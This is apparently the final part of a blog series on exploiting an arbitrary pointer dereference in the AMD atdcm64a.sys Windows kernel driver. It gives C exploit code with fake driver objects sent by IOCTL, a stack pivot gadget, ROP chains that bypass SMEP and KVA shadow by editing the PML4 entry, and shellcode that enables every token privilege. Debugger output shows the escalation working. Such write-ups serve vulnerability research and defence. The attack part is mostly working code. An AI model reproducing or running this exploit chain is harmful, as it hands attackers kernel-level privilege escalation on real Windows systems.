Exploiting AMD atdcm64a.sys arbitrary pointer dereference

In the previous part of the series we successfully confirmed the vulnerabilities we discovered in our target kernel driver by proving that we can leak the base address of ntoskrnl.exe and hijack the execution flow to an arbitrary location of our choice.

In this final part, we will craft a full exploit that allows us to enable all privileges on Windows.

Now that we’ve confirmed both vulnerabilities we can start crafting an exploit. In this phase the first step is to look for research papers or blog posts showing how to exploit this type of vulnerability. After googling a bit I’ve found an interesting presentation showing how to exploit such a vulnerability and what seems the related exploit code.

The general idea of the research is the following:

Redirect the execution flow to a ROP gadget that allows to perform stack pivoting. In a few words stack pivoting means modifying the stack pointer, that is RSP, to point to an user-mode address X that we control.
Execute a ROP chain stored at address X that allows to obtain LPE.
Restore execution.

The exploit shown here won’t work when HVCI is enabled.

Crafting the ROP chain

In order to retrieve gadgets from ntoskrnl.exe I’ve decided to use ropper. A very handy feature of ropper is being able to find specific gadgets based on a syntax similar to “regex”.

Let’s first look for our pivot gadget. We must find a gadget that loads in RSP a value that is below the maximum user-mode address and is a multiple of 8. Multiple of 8 means the last 3 bits of the address must be set to 0. Based on the research paper we are referencing, we can also use gadgets that load a value in ESP as the upper 4 bytes of RSP will be set to 0:

$ python Ropper.py
(ropper)> file /mnt/c/DRIVERS/windows11_ntoskrnl.exe
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] File loaded.
(windows11_ntoskrnl.exe/PE/x86_64)> search mov rsp, %
[INFO] Searching for gadgets: mov rsp, %


[INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe
0x00000001404126d8: mov rsp, qword ptr [rcx + 0x10]; jmp rdx;
[...]
0x00000001404200df: mov rsp, rbp; pop rbp; ret;


(windows11_ntoskrnl.exe/PE/x86_64)> search mov esp, %
[INFO] Searching for gadgets: mov esp, %


[INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe
[...]
0x0000000140b3a980: mov esp, 0xf6000000; ret;
[...]
0x000000014040ac03: mov esp, ebx; ret;
[...]


(windows11_ntoskrnl.exe/PE/x86_64)>

We found two interesting gadgets. Recall that we can control the value of RBX so we control EBX. Let’s inspect the gadgets in WinDbg:

0: kd> uu nt+0x0b3a980
nt!MxCreatePfn+0x94:
fffff800`2653a980 c22041          ret     4120h
fffff800`2653a983 83c104          add     ecx,4
fffff800`2653a986 443bc9          cmp     r9d,ecx
fffff800`2653a989 72b6            jb      nt!MxCreatePfn+0x55 (fffff800`2653a941)
fffff800`2653a98b 89bb00010000    mov     dword ptr [rbx+100h],edi
fffff800`2653a991 443bce          cmp     r9d,esi
fffff800`2653a994 0f82ac620100    jb      nt!MiAssignTopLevelRanges+0x12a (fffff800`26550c46)
fffff800`2653a99a 488b6c2428      mov     rbp,qword ptr [rsp+28h]
0: kd> uu nt+0x040ac03
nt!SymCryptScsTableLoad128Xmm+0x187:
fffff800`25e0ac03 8be3            mov     esp,ebx
fffff800`25e0ac05 c3              ret
[...]
0: kd>

The first one mov esp, 0xf6000000; ret; actually is a ret 4120h in WinDbg. On the other hand, the second one matches with what we see in WinDbg, so we choose the second one. We observed previously that rbx corresponds to object+0x30. So when allocating object we just need to call VirtualAlloc() specifying the address that we want in the first parameter.

At this point you can try to modify again the function pointer with our stack pivot gadget, set the breakpoints, re-launch the exploit and notice how RSP changes. Below the modified arbitraryCallDriver() function.

For the moment the shellcode could be a dummy shellcode made of dummy instructions such as NOPs (\x90) or whatever you want.

char shellcode[] = "\x48\x89[...]\xC3";

[...]
BOOL arbitraryCallDriver(PVOID outputBuffer, SIZE_T outSize) {
    char* inputBuffer = (char*)VirtualAlloc(
        NULL,
        21,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    char* object = (char*)VirtualAlloc(
        (LPVOID)(0x0000001afeffe000),
        0x12000,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
    printf("[+] object = 0x%p\n", object);
    object = (char*)(0x1aff000000 - 0x30);
    printf("[+] second object = 0x%p\n", object);

    PDEVICE_OBJECT ptr = (PDEVICE_OBJECT)(object + 0x30);

    memset(object, 0x41, 0x30);

    printf("[+] ptr = 0x%p\n", ptr);
    char* object2 = (char*)VirtualAlloc(
        NULL,
        SIZE_BUF,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    printf("[+] object2 = 0x%p\n", object2); //0x0000001af5ff0000
    memset(object2, 0x43, 0x30);

    char* driverObject = (char*)VirtualAlloc(
        NULL,
        SIZE_BUF,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memset(driverObject, 0x50, SIZE_BUF);
    printf("[+] driverObject = 0x%p\n", driverObject);
    char* ptrDriver = driverObject + 0x30;
    char* pDriverFunction = ptrDriver + 0x1b*8+0x70;

    *((PDWORD64)pDriverFunction) = g_ntbase+ 0x40ac03;   //mov esp, ebx; ret

    ptr->AttachedDevice = (PDEVICE_OBJECT)(object2 + 0x30);

    
    memset(ptr->AttachedDevice, 0x42, SIZE_BUF-0x40);
    //*((DWORD*)ptr->AttachedDevice) = 0xf6000000;

    printf("[+] ptr->AttachedDevice = 0x%p\n", ptr->AttachedDevice);
    
    PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000feffe000, 0x12000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
    if (fake_stack == 0) {
        printf("[-] VirtualAlloc failed with error: %d\n", GetLastError());
        exit(0);
    }
    printf("[*] fake_stack = 0x%p\n", fake_stack);

    PULONGLONG ropStack = (PULONGLONG)fake_stack + 0x2000;

    memset(fake_stack, 0x41, 0x12000);
    
    printf("[*] ropStack = 0x%p\n", ropStack);
    DWORD index = 0;

    char* scbase = (char*)VirtualAlloc((LPVOID)0x1a1a1a000000, 0x5000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!VirtualLock(scbase, 0x5000)) {
        printf("[-] virtualLock failed with error: %d\n", GetLastError());
        exit(0);
    }
    memset(scbase, 0x42, 0x5000);
    char* sc = scbase + 0x3500;
    memcpy(sc, shellcode, sizeof(shellcode));

    printf("[*] sc = 0x%p\n", sc);

    //TODO: beginning of rop chain at ropStack

#ifdef _DEBUG
    for (int i = 0; i < index; i++) {
        printf("ropStack[%d] %p : 0x%p\n", i, &ropStack[i], ropStack[i]);
    }
#endif
    ptr->AttachedDevice->DriverObject = (_DRIVER_OBJECT*)ptrDriver;
    ptr->AttachedDevice->AttachedDevice = 0;
    char* ptr2 = inputBuffer;
    *(ptr2) = 0;
    ptr2 += 1;
    *((PDWORD64)ptr2) = (DWORD64)ptr;
    

    printf("[+] User buffer allocated: 0x%8p\n", inputBuffer);

    DWORD bytesRet = 0;

    getchar();
    BOOL res = DeviceIoControl(
        g_device,
        IOCTL_ARBITRARYCALLDRIVER,
        inputBuffer,
        SIZE_BUF,
        outputBuffer,
        outSize,
        &bytesRet,
        NULL
    );

    printf("[*] sent IOCTL_ARBITRARYCALLDRIVER \n");
    if (!res) {
        printf("[-] DeviceIoControl failed with error: %d\n", GetLastError());
    }
    return res;
}
[...]

The idea of the code above is to allocate object in a way that points at address 0x0000001afeffffd0. This way our first rogue _DRIVER_OBJECT will point to address object+0x30 = 0x0000001aff000000.

When reaching the jmp rax instruction RBX will contain the value 0x0000001aff000000 that is object+0x30. This means that when we execute our stack pivoting gadget mov esp, ebx; ret RSP will be loaded with value 0x00000000ff000000.

And in fact our ropStack variable will exactly point at address 0x00000000ff000000. So we are left with filling the memory referenced by ropStack with a ROP chain that bypasses SMEP and finally redirects execution to our shellcode.

Here I provided a diagram that hopefully summarizes the different data structures in user-space memory with their addresses:

Diagram of the structures allocated by arbitraryCallDriver()

First SMEP bypass ROP Chain

Now we can start crafting our ROP chain in order to bypass SMEP. Initially I crafted the following ROP chain (g_ntbase holds the base address of ntoskrnl.exe. I remind we can retrieve it by exploiting the arbitrary MSR read).

//<call MiGetPteAddress in order to get PTE. PTE address returned in rax>
ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret;
ropStack[index] = (ULONGLONG)(scbase+0x3000); index++;          // shellcode address pte
ropStack[index] = g_ntbase + 0x203beb; index++; // pop rax; ret;
ropStack[index] = g_ntbase + 0x2abae4; index++; //address of nt!MiGetPteAddress
ropStack[index] = g_ntbase + 0x2803b8; index++; // jmp rax;
// <call MiGetPteAddress in order to get PTE. PTE address returned in rax>


// <Flip U=S bit>  PTE VA already in rax
ropStack[index] = g_ntbase + 0x20FA62; index++; // pop rcx; ret;
ropStack[index] = 0x0000000000000063; index++;  // DIRTY + ACCESSED + R/W + PRESENT
ropStack[index] = g_ntbase + 0x4531f1; index++; // mov byte ptr[rax], cl; ret;
ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret;
// </Flip U=S bit>


// <shellcode>
ropStack[index] = (ULONGLONG)sc; index++;      // Shellcode address
// <shellcode>

The ROP chain above does the following:

Call nt!MiGetPteAddress passing as input the address of our shellcode (later we will think about the shellcode too), in order to retrieve the address of the corresponding PTE, and stores the result in RAX.
Set the bits DIRTY, ACCESSED, R/W, and PRESENT to 1 and OWNER bit to 0 of the PTE.
Execute the instruction wbinvd in order to flush the instruction cache and ensure ROP gadgets are executed and the PTE is modified.
Execute the shellcode.

So now we can just recompile the exploit, set a breakpoint at the first gadget of our ROP chain and launch it (at this point I think it’s unnecessary to use the IDA Pro Debugger so I suggest switching to WinDbg). You can see the breakpoint gets hit:

0: kd> ba e 1 nt+0x2053e5
0: kd> g
Breakpoint 0 hit
nt!KeRemoveQueueDpcEx+0x125:
fffff800`25c053e5 59              pop     rcx
0: kd> r
rax=fffff80025e0ac03 rbx=0000001aff000000 rcx=000001f6a94d0030
rdx=ffffe18f37ad8000 rsi=ffffe18f365aa00d rdi=000001f6a94d0030
rip=fffff80025c053e5 rsp=00000000ff000008 rbp=0000000000000000
 r8=000000000000001b  r9=000001f6a94d0030 r10=fffff80025e0ac03
r11=0000000000000000 r12=0000000000000004 r13=ffffe18f35dfa4c0
r14=ffffe18f35dfa3f0 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
nt!KeRemoveQueueDpcEx+0x125:
fffff800`25c053e5 59              pop     rcx
0: kd> p
KDTARGET: Refreshing KD connection


*** Fatal System Error: 0x0000000a
                       (0x00000000FEFFF319,0x00000000000000FF,0x00000000000000F6,0xFFFFF80025E18BE0)


[...]
0: kd> !analyze -v
[...]


IRQL_NOT_LESS_OR_EQUAL (a)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.
If a kernel debugger is available get the stack backtrace.
Arguments:
Arg1: 00000000fefff319, memory referenced
Arg2: 00000000000000ff, IRQL
Arg3: 00000000000000f6, bitfield :
    bit 0 : value 0 = read operation, 1 = write operation
    bit 3 : value 0 = not an execute operation, 1 = execute operation (only on chips which support this level of status)
Arg4: fffff80025e18be0, address which referenced memory


Debugging Details:
------------------


[...]


BUGCHECK_CODE:  a


BUGCHECK_P1: fefff319


BUGCHECK_P2: ff


BUGCHECK_P3: f6


BUGCHECK_P4: fffff80025e18be0


[...]
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.


A fatal system error has occurred.


0: kd> k
 # Child-SP          RetAddr               Call Site
00 fffff800`28a944c8 fffff800`25f668e2     nt!DbgBreakPointWithStatus
01 fffff800`28a944d0 fffff800`25f65fa3     nt!KiBugCheckDebugBreak+0x12
02 fffff800`28a94530 fffff800`25e16c07     nt!KeBugCheck2+0xba3
03 fffff800`28a94ca0 fffff800`25e2c4e9     nt!KeBugCheckEx+0x107
04 fffff800`28a94ce0 fffff800`25e27a34     nt!KiBugCheckDispatch+0x69
05 fffff800`28a94e20 fffff800`25e18be0     nt!KiPageFault+0x474
06 fffff800`28a94fb0 fffff800`25e19567     nt!KiInterruptSubDispatchNoLockNoEtw+0x20
07 00000000`fefff2f0 fffff800`25d1375f     nt!KiInterruptDispatchNoLockNoEtw+0x37
08 00000000`fefff480 fffff800`264ae2a6     nt!KeThawExecution+0xef
09 00000000`fefff4b0 fffff800`25d0b38a     nt!KdExitDebugger+0xc2
0a 00000000`fefff4e0 fffff800`264ae117     nt!KdpReport+0x136
0b 00000000`fefff520 fffff800`25d0a93e     nt!KdpTrap+0x37
0c 00000000`fefff570 fffff800`25d0981f     nt!KdTrap+0x22
0d 00000000`fefff5b0 fffff800`25e2c63c     nt!KiDispatchException+0x19f
0e 00000000`fefffc90 fffff800`25e24423     nt!KiExceptionDispatch+0x13c
0f 00000000`fefffe70 fffff800`25c053e5     nt!KxDebugTrapOrFault+0x423
10 00000000`ff000008 fffff800`25c03beb     nt!KeRemoveQueueDpcEx+0x125
11 00000000`ff000018 00001a1a`1a003500     nt!CmSiMapViewOfSection+0x57
12 00000000`ff000078 41414141`41414141     0x00001a1a`1a003500
13 00000000`ff000080 41414141`41414141     0x41414141`41414141
14 00000000`ff000088 41414141`41414141     0x41414141`41414141
15 00000000`ff000090 41414141`41414141     0x41414141`41414141
[...]

You can see an error happened when trying to dereference memory at address 0x00000000fefff319 close to our ropStack. I thought it may happen due to a page fault (as you can read from WinDbg). So I tried modifying the code as follows:

[...]
if (!VirtualLock((char*)ropStack - 0x3000, 0x10000)) {
        printf("[-] virtualLock failed with error: %d\n", GetLastError());
        exit(0);
    }
[...]

The idea is to call VirtualLock() on the pages containing our ROP chain and also on the adjacent pages. Based on MSDN, this Win32 API is supposed to lock the pages in physical memory and should therefore avoid page faults. However, I wasn’t able to solve the issue.

On the other hand I noticed analyzing the stack trace a couple of functions such as nt!KdTrap and nt!KdExitDebugger. So I thought maybe the issue is stepping with the debugger. In fact, if you try to set a breakpoint for example on the fifth ROP gadget, you will notice the breakpoint gets hit confirming the ROP gadgets are actually executed successfully!

So, it looks like we just can’t debug our ROP chain but we can execute it 😅

If we set a breakpoint directly to the first instruction of our shellcode we can see we successfully hit the breakpoint. At this point we can also notice the owner bit of the shellcode’s PTE is set to 0 (supervisor mode) confirming the ROP chain was successful:

0: kd> !process 0 0 DrvExpTemplate.exe
PROCESS ffffe18f36e9e0c0
    SessionId: 1  Cid: 06f0    Peb: ae8969f000  ParentCid: 0720
    DirBase: 119fd2002  ObjectTable: ffff9602fa50b4c0  HandleCount:  51.
    Image: DrvExpTemplate.exe


0: kd> .process /r /p /i ffffe18f36e9e0c0
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff800`25e20ca0 cc              int     3
1: kd> dx @$curprocess.Name
@$curprocess.Name : DrvExpTemplate.exe
    Length           : 0x12
1: kd> ba e 1 0x00001a1a1a003500
1: kd> g
... Retry sending the same data packet for 64 times.
The transport connection between host kernel debugger and target Windows seems lost.
please try resync with target, recycle the host debugger, or reboot the target Windows.
Breakpoint 0 hit
00001a1a`1a003500 4889c2          mov     rdx,rax
0: kd> !pte 0x00001a1a1a003500
                                           VA 00001a1a1a003500
PXE at FFFFFEFF7FBFD1A0    PPE at FFFFFEFF7FA34340    PDE at FFFFFEFF46868680    PTE at FFFFFE8D0D0D0018
contains 8A00000222774867  contains 0A00000129075867  contains 0A000001BBD76867  contains 08000001BCC7A863
pfn 222774    ---DA--UW-V  pfn 129075    ---DA--UWEV  pfn 1bbd76    ---DA--UWEV  pfn 1bcc7a    ---DA--KWEV

Now, let’s try to set a breakpoint at the second instruction in the shellcode and see if we hit it:

0: kd> !process 0 0 DrvExpTemplate.exe
PROCESS ffffe18f3578e0c0
    SessionId: 1  Cid: 0c08    Peb: ede7a83000  ParentCid: 0720
    DirBase: 1b7fd5002  ObjectTable: ffff9602ff106c40  HandleCount:  51.
    Image: DrvExpTemplate.exe


0: kd> .process /r /i /p ffffe18f3578e0c0
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff800`25e20ca0 cc              int     3
1: kd> dx @$curprocess.Name
@$curprocess.Name : DrvExpTemplate.exe
    Length           : 0x12
1: kd> uu 00001a1a`1a003500 L3
00001a1a`1a003500 4889c2          mov     rdx,rax
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
00001a1a`1a003506 480fbae902      bts     rcx,2
1: kd> ba e 1 00001a1a`1a003503
1: kd>

We launch again the exploit and the VM just restarts.

Kernel Virtual Address Shadow

The issue with our SMEP bypass strategy is that it is suitable for versions of Windows 10 released before March 2018. After that, Microsoft introduced Kernel Virtual Address Shadow, a protection technique for mitigating Meltdown vulnerability, having also the secondary effect of preventing kernel-mode execution in user-mode code.

This article was definitely helpful in understanding Kernel Virtual Address Shadow and how to bypass it.

Referring to the article, it is possible to detect if KVA is enabled by checking the PML4 entry (PML4E) of our shellcode’s address. In fact we already did it in WinDbg:

0: kd> !pte 0x00001a1a1a003500
                                           VA 00001a1a1a003500
PXE at FFFFFEFF7FBFD1A0    PPE at FFFFFEFF7FA34340    PDE at FFFFFEFF46868680    PTE at FFFFFE8D0D0D0018
contains 8A00000222774867  contains 0A00000129075867  contains 0A000001BBD76867  contains 08000001BCC7A863
pfn 222774    ---DA--UW-V  pfn 129075    ---DA--UWEV  pfn 1bbd76    ---DA--UWEV  pfn 1bcc7a    ---DA--KWEV

We can see bits of our PML4 entry (known as PX entry or PXE in Windows) are ---DA--UW-V. So It’s not executable (the E flag doesn’t appear in WinDbg) as explained in the article.

According to the article, the strategy for bypassing KVA and SMEP is the following:

Retrieve the PML4E’s address.
Set bit at index 63 (NX bit) and bit at index 2 (Owner bit) to 0 of the PML4E, in order to make the PML4E both executable and with Owner = supervisor (in a x64 architecture, PML4E is a 64 bits value with indexes going from 0 to 63).

A note on SMEP bypass using the CR4 register technique

At this point it would be probably easier to disable SMEP by just using the technique that clears the bit at index 20 of the CR4 register.

However, I didn’t like the idea of possibly triggering +. In addition, using ropper I couldn’t find “nice gadgets” that allow to modify the CR4 register.

Here’s the output of ropper looking for gadgets that save the CR4 register in another one:

(windows11_ntoskrnl.exe/PE/x86_64)> search % %, cr4
[INFO] Searching for gadgets: % %, cr4

[INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe
0x0000000140b14519: add dword ptr [rbp - 0xf], esi; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
0x0000000140b1451a: jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
0x000000014042815d: mov r9, cr4; mov r8, cr0; mov ecx, 0x7f; call 0x42c480; nop; ret;
0x0000000140b1451c: mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
0x000000014042815e: mov rcx, cr4; mov r8, cr0; mov ecx, 0x7f; call 0x42c480; nop; ret;
0x0000000140b14517: sub eax, 1; jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
0x0000000140b14516: sub r8, 1; jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
0x0000000140b1451b: int1; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;

(windows11_ntoskrnl.exe/PE/x86_64)> search % cr4
[INFO] Searching for gadgets: % cr4

[...]
0x0000000140b1451b: int1; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;

(windows11_ntoskrnl.exe/PE/x86_64)>

As you can see, we have some gadgets that are followed by a call to a fixed location (that I would avoid).

The most promising gadget in my opinion was 0x0000000140b1451c: mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;. However, you can see it ends up flipping a bit of the CR4 register, that again may trigger PatchGuard or other unwelcome behavior.

KVA/SMEP bypass ROP chain

The first thing to do in crafting this second ROP chain is retrieving the address of the PML4 entry.

Based on the article, the function for retrieving the PML4E address is CalculatePml4VirtualAddress() and It requires two indexes:

pml4SelfRefIndex: calculated through ExtractPml4Index() passing as input the pteAddress that is located at nt!MiGetPteAddress+0x13.
pml4Index: calculated again through the ExtractPml4Index() but passing as input the address of the shellcode.

The pml4Index can be easily calculated from user-mode, out of the ROP chain, as we already know the address of the shellcode:

[...]
unsigned int ExtractPml4Index(PVOID address)
{
    return ((uintptr_t)address >> 39) & 0x1ff;
}
[...]
BOOL arbitraryCallDriver(PVOID outputBuffer, SIZE_T outSize) {
[...]

    memset(scbase, 0x42, 0x5000);
    char* sc = scbase + 0x3500;
    memcpy(sc, shellcode, sizeof(shellcode));


    unsigned int pml4shellcode_index = ExtractPml4Index(sc);
    printf("[*] sc = 0x%p\n", sc);
    printf("[*] pml4shellcode_index 0x%p\n", pml4shellcode_index);

    //start of ROP chain
}

On the other hand, the pml4SelfRefIndex must be calculated inside our ROP chain, as we must start from the address at nt!MiGetPteAddress+0x13.

So first we read the address at nt!MiGetPteAddress+0x13 and store the result in rax:

//<get base from nt!MiGetPteAddress+0x13>
ropStack[index] = g_ntbase + 0x203beb; index++; // pop rax; ret;
ropStack[index] = g_ntbase + 0x2abaf7; index++; // address of nt!MiGetPteAddress+0x13
ropStack[index] = g_ntbase + 0x235aa6; index++; // mov rax, qword ptr [rax]; ret;
//<get base from nt!MiGetPteAddress+0x13>

Then we calculate the pml4SelfRefIndex from the address previously stored in rax. This is like re-implementing the ExtractPml4Index() with ROP gadgets. So we basically have to right shift rax by 39 and then and rax with constant 0x1ff.

This is achieved with the ROP chain below where we shift right rax by 0xc+0xc+0xc+3=0x27 (0x27 corresponds to 39). The calculated pml4SelfRefIndex is finally moved from rax to rcx.

//<get pml4Index>
ropStack[index] = g_ntbase + 0x34bb9c; index++; // pop rdx; ret;
ropStack[index] = 0x1ff; index++; // 0x1ff
ropStack[index] = g_ntbase + 0x752664; index++;// shr rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x752664; index++;// shr rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x752664; index++;// shr rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x38738b; index++;//shr rax, 3; ret;
ropStack[index] = g_ntbase + 0x358532; index++;// and rax, rdx; ret;
//<get pml4index> now pml4index in rax

//<move pml4index in rcx>
ropStack[index] = g_ntbase + 0x34bb9c; index++;// pop rdx; ret;
ropStack[index] = (ULONGLONG)&ropStack[index + 3]; index++;
ropStack[index] = g_ntbase + 0x35dbc9; index++; // mov qword ptr [rdx], rax; ret;
ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret;
ropStack[index] = 0x4141414141414141; index++;//dummy
//<mov pml4index in rcx>

Now that we have both indexes we can implement the CalculatePml4VirtualAddress() in the ROP chain.

As we can see the ROP chain below first loads in rax the constant value 0xffff. After that It shift left rax by 0x3 three times, that corresponds to a shift left by 0x9, and then performs an or between rax and the pml4SelfRefIndex stored in rcx. It repeats this four times, according to the algorithm in the referenced article.

Finally, it performs one last shift left of rax by 0xc and or rax with pml4Index*8. At this point the address of the PML4E is now in rax:

//<get pml4 address>
ropStack[index] = g_ntbase + 0x203beb; index++;// pop rax; ret;
ropStack[index] = 0xffff; index++;
//first round
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret;
//second round
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret;
//third round
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret;
//fourth round
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret;
//fifth round
ropStack[index] = g_ntbase + 0x322d1b; index++;// shl rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret;
ropStack[index] = (DWORD64)pml4shellcode_index * 8; index++;
ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret;
//<get pml4 address> pml4 address in rax

We then set to 0 the bit at index 2, meaning Owner bit = Supervisor, and the bit at index 63, the NX bit using the btr instruction:

//<clean owner bit O=S position 2>
ropStack[index] = g_ntbase + 0x34bb9c; index++;// pop rdx; ret;
ropStack[index] = 0x2; index++;
ropStack[index] = g_ntbase + 0x354294; index++;// btr qword ptr [rax], rdx; ret;
//<clean owner bit O=S position 2>

//<clean NX bit position 63>
ropStack[index] = g_ntbase + 0x34bb9c; index++;// pop rdx; ret;
ropStack[index] = 63; index++;
ropStack[index] = g_ntbase + 0x354294; index++;// btr qword ptr [rax], rdx; ret;
//<clean NX bit position 63>

At the end of the chain we just need to execute the wbinvdinstruction in order to flush the CPU instruction cache, ensuring the bits in the PML4E are actually modified, and then redirect execution to our shellcode:

ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret;

//<shellcode>
ropStack[index] = (ULONGLONG)sc; index++;

At this point we can recompile the PoC with our KVA/SMEP bypass ROP chain, set a breakpoint on the second instruction of our shellcode and notice the breakpoint gets hit successfully. We can also check the status of the PML4 entry to notice it was modified successfully:

```
0: kd> !process 0 0 DrvExpTemplate.exe
PROCESS ffffe18f381130c0
    SessionId: 1  Cid: 1e20    Peb: 2d546c7000  ParentCid: 0720
    DirBase: 1aea2f002  ObjectTable: ffff9602f9530040  HandleCount:  51.
    Image: DrvExpTemplate.exe

0: kd> .process /p /r /i ffffe18f381130c0
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff800`25e20ca0 cc              int     3
1: kd> dx @$curprocess.Name
@$curprocess.Name : DrvExpTemplate.exe
    Length           : 0x12
1: kd> ba e 1 00001a1a`1a003503
1: kd> g
Breakpoint 0 hit
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
1: kd> uu 00001a1a`1a003500 L5
00001a1a`1a003500 4889c2          mov     rdx,rax
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
00001a1a`1a003506 480fbae902      bts     rcx,2
00001a1a`1a00350b 480fbae93f      bts     rcx,3Fh
00001a1a`1a003510 4831c0          xor     rax,rax
1: kd> uu @rip L1
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
1: kd> !pte @rip
                                           VA 00001a1a1a003503
PXE at FFFFFEFF7FBFD1A0    PPE at FFFFFEFF7FA34340    PDE at FFFFFEFF46868680    PTE at FFFFFE8D0D0D0018
contains 0A000001AA4D0863  contains 0A000001AF9D1867  contains 0A0000019DCD2867  contains 08000001AA0D6867
pfn 1aa4d0    ---DA--KWEV  pfn 1af9d1    ---DA--UWEV  pfn 19dcd2    ---DA--UWEV  pfn 1aa0d6    ---DA--UWEV
```

Increment privileges payload

Here’s the disassembled shellcode payload (generated with https://defuse.ca/online-x86-assembler.htm):

// increment privileges payload
xor    rax,rax
mov    rax,QWORD PTR gs:[rax+0x188]
mov    rax,QWORD PTR [rax+0xb8]
mov    r8,QWORD PTR [rax+0x4b8]
and    r8,0xfffffffffffffff0
movabs r9,0x1ff2ffffbc
mov    QWORD PTR [r8+0x40],r9
mov    QWORD PTR [r8+0x48],r9
xor    rax,rax //just a random instruction

It does the following:

Retrieve the current process’s _EPROCESS structure
Retrieve the associated _TOKEN structure
Modify the fields Present and Enabled of _SEP_TOKEN_PRIVILEGES structure in order to enable all the privileges.

At this point we can try compiling again our exploit, set a breakpoint at the latest instruction in our shellcode (final xor rax,rax instruction) and inspect the current token privileges with the !tokencommand. We can notice all the privileges get enabled successfully as shown below:

0: kd> ba e 1 00001a1a`1a00353f
0: kd> g
Breakpoint 0 hit
00001a1a`1a00353f 4831c0          xor     rax,rax
1: kd> !token
Thread is not impersonating. Using process token...
[...]
Privs: 
 02 0x000000002 SeCreateTokenPrivilege            Attributes - Enabled 
 03 0x000000003 SeAssignPrimaryTokenPrivilege     Attributes - Enabled 
 04 0x000000004 SeLockMemoryPrivilege             Attributes - Enabled 
 05 0x000000005 SeIncreaseQuotaPrivilege          Attributes - Enabled 
 07 0x000000007 SeTcbPrivilege                    Attributes - Enabled 
 08 0x000000008 SeSecurityPrivilege               Attributes - Enabled 
 09 0x000000009 SeTakeOwnershipPrivilege          Attributes - Enabled 
 10 0x00000000a SeLoadDriverPrivilege             Attributes - Enabled 
 11 0x00000000b SeSystemProfilePrivilege          Attributes - Enabled 
 12 0x00000000c SeSystemtimePrivilege             Attributes - Enabled 
 13 0x00000000d SeProfileSingleProcessPrivilege   Attributes - Enabled 
 14 0x00000000e SeIncreaseBasePriorityPrivilege   Attributes - Enabled 
 15 0x00000000f SeCreatePagefilePrivilege         Attributes - Enabled 
 16 0x000000010 SeCreatePermanentPrivilege        Attributes - Enabled 
 17 0x000000011 SeBackupPrivilege                 Attributes - Enabled 
 18 0x000000012 SeRestorePrivilege                Attributes - Enabled 
 19 0x000000013 SeShutdownPrivilege               Attributes - Enabled 
